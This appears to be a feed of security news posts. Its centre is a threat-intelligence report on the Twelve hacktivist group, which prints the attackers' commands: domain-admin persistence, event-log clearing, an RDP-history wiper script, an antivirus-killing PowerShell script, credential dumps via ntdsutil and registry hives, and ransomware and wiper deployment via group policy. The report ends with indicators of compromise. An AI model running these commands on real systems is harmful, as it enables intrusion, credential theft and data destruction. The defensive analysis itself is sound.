[Lynnadeng]’s team wanted to monitor the Los Angeles River over time and wanted citizen scientists — or anyone, for that matter — to help. They built a dual phone holder to allow random passersby to use their phones to take photos. A QR code lets them easily send the pictures to the team. The 3D printed holder is fixed in place and has a known gap that allows stereo reconstruction from pairs of photos.

Of course, people aren’t going to know what to do, so you need a sign with instructions along with the QR code. One advantage to this scheme is that it’s cheap. All the camera hardware is in the public’s phone. Of course, you still have to make the holder robust to the elements, but that’s not nearly as difficult as supplying power and weatherproofing cameras and radios.

The real interesting part is the software. At first, we were disappointed that the post had a dead link to GitHub, but it was easy enough to find the correct one. In some cases, people will use a single camera, so 3D reconstruction isn’t always possible.

We love citizen science around here. No matter where you live, there are many opportunities to contribute.

hackaday.com/2024/09/20/inviti…

I ricercatori dell’ASEC hanno identificato nuovi attacchi contro i server SSH Linux poco protetti. In essi, gli hacker hanno utilizzato il malware Supershell scritto in Go. Questa backdoor offre agli aggressori il controllo remoto sui sistemi compromessi.

Dopo l’infezione iniziale, gli hacker avviano gli scanner per cercare altri obiettivi vulnerabili. Si ritiene che questi attacchi vengano effettuati utilizzando dizionari di password ottenuti da server già infetti.

Gli aggressori utilizzano i comandi wget, curl, tftp e ftpget per scaricare ed eseguire script dannosi. Questi script consentono di ottenere pieno accesso al sistema e installare malware aggiuntivo, quindi nascondere le tracce dell’attacco eliminando i file scaricati.

Installando una backdoor, gli hacker possono installare minatori di criptovaluta nascosti come XMRig su host infetti, che è un tipico modello di attacco sui server Linux vulnerabili. Nella campagna in esame gli hacker hanno utilizzato anche Cobalt Strike per configurare l’accesso remoto e ElfMiner per installare crypto miner.

Gli esperti raccomandano agli amministratori di rafforzare la sicurezza dei propri sistemi, aggiornare regolarmente il software, utilizzare password complesse e abilitare i firewall per ridurre al minimo il rischio di infezione.

L'articolo Nuovi Attacchi ai Server SSH Linux: Malware Supershell Compromette i Sistemi Vulnerabili proviene da il blog della sicurezza informatica.

Open Source has sort of eaten everything in software these days. And that includes malware, apparently, with open source Command and Control (C2) frameworks like Sliver and Havoc gaining traction. And of course, this oddball intersection of Open Source and security has intrigued at least one security researcher who has found some interesting vulnerabilities.

Before we dive into what was found, you may wonder why open source malware tools exist. First off, trustworthy C2 servers are quite useful for researchers, who need access to such tools for testing. Then there is Red Teaming, where a security professional launches a mock attack against a target to test its defenses. A C2 is often useful for education and hobby level work, and then there are the true criminals that do use these Open Source tools. It takes all types.

A C2 system consists of an agent installed on compromised systems, usually aiming for stealth. These agents connect to a central server, sending information and then executing any instructions given. And finally there’s a client, which is often just a web interface or even a command line interface.

Now what sort of fun is possible in these C2 systems? Up first is Sliver, written in Go, with a retro command line interface. Sliver supports launching Metasploit on compromised hosts. Turns out, it accidentally supported running Metasploit modules against the server’s OS itself, leading to an easy remote shell from an authenticated controller account.

Havoc has a fancy user interface for the clients, and also a command injection flaw. A service name field gets used to generate a shell command, so you’re only a simple escape away from running commands. That’s not quite as useful as the API that failed open when a bad username/password was given. Oops.

Trains!

[Bertin Jose] has a bit of a side hobby, of scanning the Internet for interesting endpoints, with an emphasis on industrial control systems. In an automated scan, a CZAT7 device popped up — a traction power substation controller. This is a miniature power station that supplies power to electric railways. And this one was not only connected to the Internet, it exposed a web interface that probably wasn’t intended to be public. And it included coordinates. It’s delightful that we can point to a picture on Google Maps, to the little building in Poland where this controller lives.

[Bertin] has enough experience with control devices like these, to know that 1111 is a common password. It’s wild that for these devices, both 1111 and 2222 worked for read/write access to the devices. This is where there was clearly a line, where fiddling around further inside these real devices would be ill-advised. What turned out to be more of a problem is finding the right people to disclose the device to. There was never a response, but the device seems to be finally off the Internet.

Raptor Train

We have news this week of a joint effort between Lumen Technologies and the US DoJ to take down the Raptor Train, a botnet that lives on a variety of routers, IoT devices, and cameras and NVRs. This botnet is interesting, that each device was only compromised for an average of 17 days at a time, with the infection only persisting until the next reboot.

What’s always fun about watching malware activity like this is to line up activity with timezones around the world. This one roughly corresponds to a 10:00 AM to 7:00 PM working day in China Standard Time, which checks out with the likely attribution to the Chinese group, Flax Typhoon. The count of total devices was somewhere around 260,000, with exploitation due to a combination of 0-day and n-day vulnerabilities. Turns out maybe it’s not a great idea to put those cameras on the Internet.

Discord and DAVE

Discord has rolled out DAVE, Discord Audio and Video end-to-end Encryption. This new solution will provide encryption for voice and video for DMs, Group DMs, and other live calls on Discord. The solution is Open Source, and was designed in collaboration with trailofbits.

Lots of established cryptography was used, and at a brief look the scheme seems to check out. Notably missing is any mention of quantum-resistant cryptography. That’s not entirely unexpected, as we’re still several years away from practical quantum computers, and the cryptography schemes designed to be immune to quantum cryptography are still quite new and immature.

The Other Side of the Coin

In an interesting counterpoint to Discord’s new scheme, Interpol has taken down Ghost, an end-to-end-encrypted communications platform widely used for organized crime. It seems that Ghost was designed and marketed specifically for criminal use, but one has to ask the question about whether Discord will also face repercussions for the move to strong encryption.

Bits and Bytes

The folks at Cyber Security Associates have the scoop on doing a Patch Diff on a vulnerability fixed in a recent Windows Patch Tuesday. The short explanation is that incoming calls to the driver weren’t checked for whether they originated in the kernel or in userspace.

And finally, there’s a real mystery on the Internet. GreyNoise describes Noise Storms of spoofed packets flooding the Internet. These seem to be malicious, coming in waves since January 2020. The inclusion of the string LOVE in recent packets suggests the name LOVE Storm. GreyNoise has made packet captures available, if any of our readers feel like joining in on the sleuthing to figure out what these packets are up to.

hackaday.com/2024/09/20/this-w…

In the spring of 2024, posts with real people’s personal data began appearing on the -=TWELVE=- Telegram channel. Soon it was blocked for falling foul of the Telegram terms of service. The group stayed off the radar for several months, but as we investigated a late June 2024 attack, we found that it employed techniques identical to those of Twelve and relied on C2 servers linked to the threat actor. We are therefore confident that the group is still active and will probably soon resurface. This article uses the Unified Kill Chain methodology to analyze the attackers’ actions.

About Twelve

The group was formed in April 2023 in the context of the Russian-Ukrainian conflict and has attacked Russian government organizations ever since.

The threat actor specializes in encrypting and then deleting victims’ data, which seriously complicates efforts to recover the IT environment. This suggests that their main goal is inflicting as much damage as possible. When attacking, the group aims to reach critical infrastructure, but they do not always succeed. In addition, Twelve exfiltrates sensitive information from its victims’ systems and posts it on its Telegram channel.

Interestingly, Twelve shares infrastructure, utilities and techniques (TTPs) with the DARKSTAR ransomware group, formerly known as Shadow or COMET, which suggests that the two belong to the same syndicate or activity cluster. At the same time, whereas Twelve’s actions are clearly hacktivist in nature, DARKSTAR sticks to the classic double extortion pattern. This variation of objectives within the syndicate underscores the complexity and diversity of modern cyberthreats.

Unified Kill Chain: In

The In stage in terms of the Unified Kill Chain refers to the initial phases of a cyberattack aimed at gaining access to the target organization’s LAN. These phases include a range of tactical actions: from external reconnaissance to assuming control of the systems inside the protected network.

Reconnaissance

While we do not know the exact reconnaissance techniques the threat actor uses, we suspect that they scan IP address ranges across Russia based on geotags and try to identify VPN servers and applications accessible from the internet that could be used as entry points into a target organization’s or a contractor’s infrastructure.

Resource Development

As we analyzed the cyberattacks, we found that the threat actor relied exclusively on well-known and freely available tools. The tools frequently used by the group include Cobalt Strike, mimikatz, chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner and PsExec.

Initial Access and Delivery

In most of the attacks we are aware of, the adversary gained initial access to victims’ infrastructure through valid local or domain accounts, VPN or SSH certificates. After gaining access to the victim’s infrastructure, the attackers used the Remote Desktop Protocol (RDP) to move laterally.

Most times, the attackers penetrated the target infrastructure via some of the victim’s contractors. To do this, they gained access to the contractor’s infrastructure and then used its certificate to connect to its customer’s VPN. Having obtained access to that, the adversary can connect to the customer’s systems via the Remote Desktop Protocol (RDP) and then penetrate the customer’s infrastructure.

Exploitation

Web shells

As we analyzed the web servers compromised by the attackers, we discovered a large number of web shells. The paths where these were found looked as follows.
/home/bitrix/ext_www/[REDACTED]/assets/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/templates/.default/ajax/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/admin/
All the web shells were written in PHP and bore random names:
F6d098f417.php, 3425b29f4e.php, ecb2979be7.php, 04116e895b.php, 7784ba76e2.php,
a4daa72a70.php, 5146d22914.php, 001d7a.php, 8759c7.php, 48a08b.php, 6f99ac.php,
82f5f4.php, 0dd37d.php, 6bceb2.php, d0af43.php
They could serve various purposes: some executed arbitrary commands, others moved files, and still others, created and sent email. Below are two examples of single-line web shells for moving files.

Examples of web shells for moving files

It is worth noting that most of the web shells used by threat actors are publicly available tools that can be found in publicly available sources. Here are two examples:

• https://github[.]com/stefanpejcic/wordpress-malware;
• https://github[.]com/tennc/webshell/blob/master/php/wso/wso2.php.

We use the example of a remailer (script for sending email) to examine how the web shells function.

Example of a remailer script used by the threat actor

The attackers used this PHP script to send email messages. It starts by checking for requisite data, such as the recipient’s address, subject and message body inside a POST request. If any of the key data is missing, the script reports an error and quits. After successfully checking and preparing email components, it uses the PHP mail() function to send the email.

FaceFish backdoor

An incident we investigated involved the FaceFish backdoor, loaded with the help of a web shell installed on a VMware vCenter server by exploiting the CVE-2021-21972 and CVE-2021-22005 vulnerabilities in the vSphere virtualization platform. The former vulnerability can be found in the platform’s client and allows remote code execution, while the latter is an arbitrary file upload vulnerability in the server.

Like most of the web shells used by the group, this one is publicly available.
https://github[.]com/NS-Sp4ce/CVE-2021-21972/tree/main/payload/Linux
It was located at the following path in the infected system:
/usr/lib/vmware-vsphere-ui/server/static/resources/libs/shell.jsp
Once started, FaceFish saves a libs.so shared library in the system, injects it into the sshd process with the ld.so.preload method and restarts the SSH service.

Example of FaceFish output

Persistence

To gain a foothold in the domain infrastructure, the adversary used PowerShell to add domain users and groups, and to modify ACLs (Access Control Lists) for Active Directory objects. Below is a list of the PowerShell commands they ran.
Add-DomainGroupMember -Identity [REDACTED] -Members 'EXCHANGE WINDOWS PERMISSIONS'
Add-DomainGroupMember -Identity [REDACTED] -Members 'Organization Management'
Add-DomainGroupMember -Identity [REDACTED] -Members "EXCHANGE WINDOWS PERMISSIONS"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "users" -PrincipalIdentity "engineers"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "users"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "userasdasdasds"
Set-DomainObject -Credential $Cred -Identity [REDACTED]-SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
The attackers also added domain accounts and user groups with the net.exe system utility.
net user [REDACTED] engineers /domain /add
net group [REDACTED] engineers /domain /add
net group engineers [REDACTED] /domain /add
net group engineers 'EXCHANGE WINDOWS PERMISSIONS' /add /domain
net group 'engineers' 'EXCHANGE WINDOWS PERMISSIONS' /add /domain
net group engineers /domain
net group users /domain
net group "Domain Administrators" [REDACTED] /add /domain
Furthermore, they tried distributing and running malware through the task scheduler and modified group policies to save malicious tasks for the entire domain.

Defense Evasion

To avoid detection, the attackers disguised their malware and tasks under the names of existing products or services.
C:\Windows\System32\Tasks\run
C:\Windows\System32\Tasks\Update Microsoft
C:\Windows\System32\Tasks\Yandex
C:\Windows\System32\Tasks\YandexUpdate
C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe
They also used a range of techniques to hide the traces of their activity. In particular, they cleared event logs with the wevtutil.exe system utility in various command shell variants.
powershell -command wevtutil el | Foreach-Object {Write-Host Clearing $_; wevtutil cl $_}

C:\Windows\system32\cmd.EXE" /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO
wevtutil.exe cl "%1
In addition, the attackers used a script that cleared the RDP connection history to remove the traces of their RDP usage, recent documents and list of executed files.
@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib -s -h %userprofile%\documents\Default.rdp
del %userprofile%\documents\Default.rdp
del /f /s /q /a %AppData%\Microsoft\Windows\Recent\AutomaticDestinations
reg delete "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU" /va /f

Command and Control

In one of the group’s attacks, we discovered traces of the Cobalt Strike framework, which the attackers used to contact their C2 and distribute malicious payloads. We found the tool at the following path:
\users\{username}\pictures\photos_delo\loop.exe
The adversary also used the curl and wget system utilities to deliver various tools to compromised hosts.
wget https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
curl https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

Unified Kill Chain: Through

The Through stage in terms of the Unified Cyber​ Kill Chain refers to adversary actions within a previously compromised target network aimed at gaining access to further systems and data that the attacker needs to achieve their goals. This stage involves a series of steps designed to propagate across the network and access critical assets.

Pivoting

The adversary used ngrok to tunnel traffic. They installed that utility immediately after connecting to the system, and set port 3389 (standard RDP port) in the configuration file. After that, all illegitimate connections to the system via RDP were made through ngrok. The attackers attached the utility to a service named “svchost” with the following command:
C:\ProgramData\svchost\svchost.exe service run --config
C:\ProgramData\svchost\svchost.yml

C:\ProgramData\svchost\ was a directory created by the attackers. The svchost.exe file is ngrok itself, while svchost.yml serves as its configuration file. In addition to the port number, it contains an authorization token, which looks as follows: 2YXVHSiK9hhc4aKCbH4i6BLh21J_6zwxt**********. Tokens differ between samples.

The ::::%16777216 value in the Source Network Address field, in the RDP event log indicates that the attackers initiated their connections via ngrok.

Discovery

The adversary used Advanced IP Scanner, BloodHound and adPEAS to reconnoiter the LAN and domain infrastructure, and to investigate the relationships between domains. Advanced IP Scanner can quickly identify all devices on a given network. BloodHound is used to analyze and visualize users and systems the domain trusts, and to identify paths of least resistance for privilege escalation. adPEAS is used to attack Active Directory, detect configuration flaws and identify ways to escalate domain privileges. Combined, these tools allow attackers to effectively probe and exploit victims’ LANs.

In addition, the group used PowerView module cmdlets to discover domain user accounts.
Get-DomainObject users
Get-ADUsers users
Get-ADUser users
Get-ADUser -Filter * -SearchBase "[REDACTED OU]"
Get-ADUser -Filter * -SearchBase "[REDACTED OU]" | findstr Name
The group used PowerShell to gain domain groups data.
Get-ADGroup
Get-ADGroup "EXCHANGE WINDOWS PERMISSIONS"
Get-ADGroupMember "EXCHANGE WINDOWS PERMISSIONS"
Get-ADGroupMember "engineers"
Get-DomainGroupMember engineers
Get-DomainGroupMember skzi

Privilege Escalation

To escalate privileges, the adversary primarily used the legitimate credentials of users with administrative access privileges.

In addition, they used the PowerView module to modify the attributes of new accounts they set up to achieve their goals:
Add-DomainObjectAcl -Rights 'All'
The -Rights ‘All’ parameter grants the account full access to the specified object. This may include permission to read, write, create, delete and perform various operations on the object.

Example of permissions granted with PowerView to an account of interest to the attackers

Execution

Scripts and commands

The adversary used system interpreters and publicly available tools, as well as self-written .bat and PowerShell scripts, to perform various actions in the system.

Below are some examples of attack scripts we discovered:
gpo.ps1
Sophos_kill_local.ps1
Logon.bat
CleanRDPHistory.bat
c:\intel\GPO.bat
\\netlogon\logon.bat
c:\intel\test.ps1
\\netlogon\u.bat
\SYSVOL\domain\scripts\outlookconf2003.ps1
The list of commands run by the adversary as recorded in the PowerShell log indicates that they started active PowerShell sessions on the hosts they attacked, and also gives one an idea of the operator’s level of competence.

See below for a list of commands that the attackers executed in an attempt to import the PowerView module.
impot .\PowerView.ps1
import .\PowerView.ps1
Import-Module .\PowerView.ps1
cd C:\Users\Public\Documents
Import-Module .\PowerView.ps1
Set-ExecutionPolicy bypass
Import-Module .\PowerView.ps1

Sophos_kill_local.ps1

A script we detected attempts to terminate Sophos processes on the computer and writes the results to local and remote log files.
$LogTime = Get-Date -Format "MM-dd-yyyy_hh-mm-ss"
$path = "C:\Program Files (x86)\Sophos\Logs\"
$pcname = $env:computername
$Processes = Get-WmiObject -Class Win32_Process -ComputerName $env:computername -Filter "ExecutablePath LIKE '%Sophos%'"
foreach ($process in $processes) {
$ProcessName = $process.name
$returnval = $process.terminate()
$processid = $process.handle
if($returnval.returnvalue -eq 0) {
$LogFile1 = 'C:\Program Files (x86)\Sophos\Logs\'+$LogTime+"_Success-Terminated"+".txt"
$LogFile11 = '\\[redacted]\NETLOGON\Sophos\Logs\'+$pcname+"_"+$LogTime+"_Success-Terminated"+".txt"
"The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile1 -Append -Force
"The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile11 -Append -Force
} else {
$LogFile2 = 'C:\Program Files (x86)\Sophos\Logs\'+$LogTime+"_Sophos Not-Terminated"+".txt"
$LogFile22 = '\\[redacted]\NETLOGON\Sophos\Logs\'+$pcname+"_"+$LogTime+"_Sophos Not-Terminated"+".txt"
"The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile2 -Append -Force
"The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile22 -Append -Force
}
}

Using the Task Scheduler

To perform all the ultimate destructive actions, such as starting the ransomware and wipers, the adversary used Scheduler tasks set up by modifying group policies. This enabled the adversary to execute these on all machines in the domain at the same time.

powershell
.exe

\\[DOMAIN]\netlogon\wiper
.exe

/c
\\[DOMAIN]\netlogon\twelve
.exe -pass ***");

 Copy-Item

 -Destination

Credential Access

The adversary used mimikatz to obtain user credentials. They saved the utility file under the name calculator.exe to disguise its real purpose. However, they did not bother to change the utility’s default icon. The attackers used mimikatz to set up a dump of local credentials from the memory of the lsass.exe process.

Screenshot of calculator.exe running

We found artifacts indicating that mimikatz was used on compromised hosts, both in the form of an executable file and a PowerShell script.
C:\Users\[User]\Desktop\x64\mimikatz.exe
C:\Users\[User]\Desktop\CrackMapExecWin_v2.2\hosted\Invoke-Mimikatz.ps1
C:\[Redacted]\x64\mimidrv.sys
In addition to dumping lsass.exe with mimikatz, the adversary obtained local credentials by dumping the SYSTEM, SAM and SECURITY registry branches with the reg.exe system utility and saved these to the Downloads folder for subsequent archiving and exfiltration.
C:\Users\[USER]\Downloads\SYSTEM
C:\Users\[USER]\Downloads\SAM
C:\Users\[USER]\Downloads\SECURITY
The attackers also tried to gain access to domain credentials. To do this, they used the ntdsutil.exe system utility to dump ntds.dit.

The command that dumps ntds.dit is shown below:
$system32\ntdsutil.exe",""$system32\ntdsutil.exe" "ac i ntds" ifm "create full
c:\temp" q q
To extract additional credentials from the system, the attackers then used the console version of XenArmor’s All-In-One Password Recovery Pro utility, which can extract most of a user’s credentials from registry hives.

The command to collect data with All-In-One Password Recovery Pro is shown below:
c:\programdata\update\xenallpasswordpro.exe" -a
"c:\programdata\update\report.html"
In the screenshot below, you can see an example of running this utility with the parameters that the attackers used, and a list of data that it collects when configured like that.

Lateral Movement

To move within the victim’s infrastructure, the adversary used local and domain credentials obtained in earlier phases of the attack.

In most cases, they connected to new devices on the victim’s network via the Remote Desktop Protocol (RDP) by using the mstsc.exe executable file. They would occasionally use PsExec to move across the network via SMB and use the Enter-PSSession command to start an interactive session with remote computers on the network, a PowerShell feature for managing and running commands on remote systems with the help of PowerShell Remoting.
Enter-PSSession -ComputerName [COMPUTER 1]
Enter-PSSession -ComputerName [COMPUTER 2]
Enter-PSSession -ComputerName [COMPUTER 3]
Enter-PSSession sets up a temporary interactive session between the local and remote systems, allowing the adversary to run PowerShell commands directly on remote machines as if running them locally. The communication process typically uses the WS-Management protocol running on top of HTTP or HTTPS.

Unified Kill Chain: Out

The Exit stage in terms of the Unified Kill Chain describes the adversary’s concluding actions after successfully infiltrating the target network and gaining access to all systems and data they are looking to access. This stage focuses on achieving the ultimate goals of the attack, which may include data theft, sabotage or other actions that compromise the confidentiality, integrity and availability (CIA) of the victim’s information assets.

Collection

The adversary collected substantial amounts of sensitive information about their victims: financial documents, technical drawings, corporate email, and so on. They used 7z to archive data they collected and forwarded the data via cloud sharing services.

Also during their attacks, the adversary archived and exfiltrated the Telegram data folder (tdata).
C:\Users\[User]\AppData\Roaming\Telegram Desktop\tdata\tdata.7z
This folder contains cached media files (images, videos, audio), messages, stickers and documents the user has sent or received via Telegram. The data can be used for quick access without having to download files again from the servers. The tdata folder also contains session files that allow the application to automatically connect to the account without the user having to reenter their login and password.

An adversary who gains access to the folder can extract private messages, media files and documents, which results in the leakage of sensitive personal or commercial information. The adversary can leverage session files and encryption keys to bypass authentication when signing in to a Telegram account, to read chats and to impersonate the victim when sending messages.

Exfiltration

The adversary uploaded archives containing data they were interested in to dropmefiles.net/ via a browser. We learned that DropMeFiles was the file sharing service they used when we found a page header that read, “Завантаження вдалося! – dropmefiles.net” (“Upload successful!” – dropmefiles.net) in the browser cache in the aftermath of an attack.

Impact

Ransomware

The attackers used a version of the popular LockBit 3.0 ransomware, compiled from publicly available source code, to encrypt the data.

Kaspersky Threat Attribution Engine attribution

We detected ransomware files at the following paths:

• \ProgramData\;
• \\netlogon\.

The following file names featured in known incidents involving LockBit 3.0 ransomware.

• twelve.exe;
• 1.exe;
• 12.exe;
• enc.exe;
• betta.exe;
• sed.exe;
• svo.exe.

Below is a detonation graph for the ransomware, built by Kaspersky Cloud Sandbox. It displays file execution and suspicious events that occur in the process. As you can see from the graph, the ransomware is quite noisy and generates a lot of events that give away its activity.

Detonation graph for the ransomware used by Twelve

As previously mentioned under Execution, the ransomware leverages group policies to spread across its victims’ infrastructures. The attackers used PowerShell to move the ransomware file to the netlogon network share and then ran a script to modify group policies.
powershell.exe -ex bypass -f C:\Users\Public\gpo.ps1
After updating the policies, they set up scheduled tasks on all domain computers to copy and run the ransomware.

First, the ransomware was moved from the netlogon network share to the local ProgramData directory by the Copywiper task as follows:
powershell.exe Copy-Item `\\[DOMAIN]\netlogon\twelve.exe` -Destination `C:\ProgramData`
After this, they started the ransomware from a local folder or network share via the CLI, specifying a unique password as the -pass argument:
cmd.exe` /c c:\programdata\twelve.exe -pass ************

Adversary action pattern

The ransomware algorithm depends on the built-in configuration file. The table below shows the configuration of the Trojan in question, identical across all samples we found.

The configuration file also contains a list of directories where encryption should be skipped.

It also contains a list of specific files that should not be encrypted.

Finally, the ransomware does not encrypt files with the following name extensions:

Before starting work, the ransomware terminates processes that may interfere with the encryption of individual files. The names of processes to be terminated are listed below.

The ransomware also terminates the following services:

Interestingly, the configuration for creating a ransom note lacks any contacts or ways of reaching out to the attackers. The final note consists of just the group logo.

We also found that in some cases, attackers used a Trojan made from a leaked builder for the Chaos ransomware to encrypt files. We discovered samples of that ransomware at the following paths:

As you can see from the screenshot below, the Kaspersky Threat Attribution Engine detects that one of these samples bears 60% similarity to Chaos.

Result of the Kaspersky Threat Attribution Engine file attribution

At the time we discovered the samples, it was unclear who was behind the incidents in which they were used. However, static analysis showed that the code contained characteristic lines linking the samples to the Twelve group.

Result of the static analysis of Chaos-based ransomware

Wipers

In addition to the ransomware, the adversary used wipers to destroy their victims’ infrastructures. They typically ran the wipers after encrypting files.

The wiper file we found had been compiled from publicly available source code. The wiper rewrites the master boot record (MBR) on connected drives so when the victim next turns on the device, the “From Iran with love – Shamoon” message appears on the screen, and the operating system will not load.

String written to the MBR

The file then recursively goes through each directory, except for Windows and System Volume Information, on all mounted drives, and does the following for each file:

• Overwrite the file contents with randomly generated bytes;
• Overwrite file metadata: reset size and set random created/modified/opened dates;
• Assign a random name to the file and delete it.

When done, the malicious file deletes itself and shuts down the system.

As we conducted our dynamic and static analyses, we concluded that the wiper version was identical to the publicly available one.

Wiper detonation graph in Kaspersky Cloud SandBox

Result of the wiper static analysis

Also while researching the attacks by Twelve, we discovered another version of the wiper. The sample was identical to Shamoon, except for a number of specifically renamed functions.

Renamed Shamoon-based wiper features

While investigating attacks by the group, we found wiper files at the following paths:

• \Desktop\;
• \ProgramData\;
• \\netlogon\.

The following file names have featured in known incidents involving the wiper:

• intel.exe;
• mail.exe;
• wiper.exe.

The wiper’s spread pattern across a victim’s infrastructure is almost no different from that of the ransomware. The adversary uses PowerShell to copy the wiper file to the netlogon network share and then runs a script that modifies group policies and creates scheduled tasks.
powershell -ex bypass -f \\[DOMAIN]\netlogon\outlookconf2003.ps1
The wiper file is then copied from the netlogon network share to the local ProgramData folder on all previously encrypted domain computers.
powershell.exe` Copy-Item `\\[DOMAIN]\netlogon\intel.exe` -Destination `C:\ProgramData
After this, a scheduled task starts and runs the wiper file, which destroys data on the device.
C:\ProgramData\intel.exe

Wiper spread pattern in the victim’s infrastructure

Objectives

The threat actor’s strategic goals:

• Destroy critical infrastructure and disrupt business;
• Steal sensitive data;
• Discredit victims by reporting the compromise on the attackers’ Telegram channel.

Takeaways

Twelve is mainly driven by hacktivism rather than financial gain. This shows in their modus operandi: rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims’ data and then destroy their infrastructure with a wiper to prevent recovery. The approach is indicative of a desire to cause maximum damage to target organizations without deriving direct financial benefit.

Our analysis also shows that the group sticks to a publicly available and familiar arsenal of malware tools, which suggests it makes none of its own. This makes it possible to detect and prevent Twelve’s attacks in due time. Failure to do so could result in the organization’s infrastructure sustaining significant damage from the threat actor.

Indicators of compromise

Web-Shells
05d80c987737e509ba8e6c086df95f7d
48b2e5c49f121d257b35ba599a6cd350
5dcd02bda663342b5ddea2187190c425
97aac7a2f0d2f4bdfcb0e8827a111524
dad076c784d9fcbc506c1e614aa27f1c
ecb14e506727ee67220e87ced2e6781a
f8da1f02aa64e844770e447709cdf679

Mimikatz
e930b05efe23891d19bc354a4209be3e

Scripts
7a7c0a521b7596318c7cd86582937d98
72830102884c5ebccf2afbd8d9a9ed5d
31014add3cb96eee557964784bcf8fde
7dfa50490afe4553fa6889bdafda7da2

Ngrok
43b3520d69dea9b0a27cce43c1608cad

Cobalt Strike
7bec3c59d412f6f394a290f95975e21f

Ransomware
9c74401a28bd71a87cdf5c17ad1dffa5 twelve.exe
d813f5d37ab2feed9d6a2b7d4d5b0461 12.exe
646a228c774409c285c256a8faa49bde enc.exe
5c46f361090620bfdcac6afce1150fae twelve.exe
9bd78bcf75b9011f9d7a9a6e5aee5bf6 twelve.exe
f90e95b9fcab4c1b08ca06bc2c2d6e40 12.exe
39b91f5dfbbec13a3ec7cce670cf69ad sed.exe/1.exe/Screen2.exe/SVO.exe/BETTA.EXE

Wiper
4bff90a6f7bafc8e719e8cab87ab1766 intel.exe/mail.exe

File paths
C:\ProgramData\sed.exe
C:\Users\{username}\Downloads\sed.exe
C:\Users\{username}\Desktop\sed.exe
C:\programdata\svchost\svchost.exe
C:\programdata\svchost\svchost.yml
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.exe
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.yml
C:\Users\{username}\Desktop\svchost.exe
C:\Users\{username}\Desktop\svchost.yml
C:\users\{username}\pictures\photos_delo\loop.exe
C:\users\{username}\downloads\chisel_1.9.1_windows_amd64\chisel.exe
C:\Users\{username}\Documents\PowerView.ps1
C:\Users\{username}\Documents\calculator.exe
C:\Windows\qbkLIdag.exe
C:\Windows\System32\Tasks\run
C:\Windows\System32\Tasks\Update Microsoft
C:\Windows\System32\Tasks\Yandex
C:\Windows\System32\Tasks\YandexUpdate
C:\Windows\SYSVOL\domain\scripts\intel.exe
C:\Windows\SYSVOL\domain\scripts\outlookconf2003.ps1
C:\Windows\SYSVOL\domain\scripts\ZZZZZZ
C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe
\\[DOMAIN]\netlogon\12.exe
\\[DOMAIN]\netlogon\outlookconf2003.ps1
\\[DOMAIN]\netlogon\intel.exe
C:\123\12.exe
C:\ProgramData\intel.exe
C:\Users\Public\46a2209036e6282c45f8dfd3f046033d.ps1
C:\Users\Public\gpo.ps1
C:\Windows\Logs\PsExec.exe

Domains and IPs
212.109[.]217.88
195.2[.]79.195
109.205[.]56.229
193.110[.]79.47
195.2[.]79.195
217.148[.]143.196
5.8[.]16.147
5.8[.]16.148
5.8[.]16.149
5.8[.]16.169
5.8[.]16.170
5.8[.]16.236
5.8[.]16.238
79.137[.]69.34
85.204[.]124.94
89.238[.]132.68
89.33[.]8.198
91.90[.]121.220

securelist.com/twelve-group-un…

Recently, the EPA and COBB Tuning have settled after the latter was sued for providing emissions control defeating equipment. As per the EPA’s settlement details document, COBB Tuning have since 2015 provided customers with the means to disable certain emission controls in cars, in addition to selling aftermarket exhaust pipes with insufficient catalytic systems. As part of the settlement, COBB Tuning will have to destroy any remaining device, delete any such features from its custom tuning software and otherwise take measures to fully comply with the Clean Air Act, in addition to paying a $2,914,000 civil fine.

The tuning of cars has come a long way from the 1960s when tweaking the carburetor air-fuel ratios was the way to get more power. These days cars not only have multiple layers of computers and sensor systems that constantly monitor and tweak the car’s systems, they also have a myriad of emission controls, ranging from permissible air-fuel ratios to catalytic converters. It’s little surprise that these systems can significantly impact the raw performance one might extract from a car’s engine, but if the exhaust of nitrogen-oxides and other pollutants is to be kept within legal limits, simply deleting these limits is not a permissible option.

COBB Tuning proclaimed that they weren’t aware of these issues, and that they never marketed these features as ’emission controls defeating’. They were however aware of issues regarding their products, which is why they announced ‘Project Green Speed’ in 2022, which supposedly would have brought COBB into compliance. Now it would seem that the EPA did find fault despite this, and COBB was forced to making adjustments.

Although perhaps not as egregious as modifying diesel trucks to ‘roll coal’, federal law has made it abundantly clear that if you really want to have fun tweaking and tuning your car without pesky environmental laws getting in the way, you could consider switching to electric drivetrains, even if they’re mind-numbingly easy to make performant compared to internal combustion engines.

hackaday.com/2024/09/20/cobb-t…

Recentemente, Dell Technologies, una delle principali aziende tecnologiche americane, è stata coinvolta in un presunto data breach. Un hacker, noto con l’alias “grep”, ha dichiarato di aver violato i sistemi di Dell, esponendo i dati di oltre 10800 dipendenti e partner interni. L’informazione è stata divulgata su un forum del dark web, sollevando preoccupazioni significative riguardo alla sicurezza informatica dell’azienda.

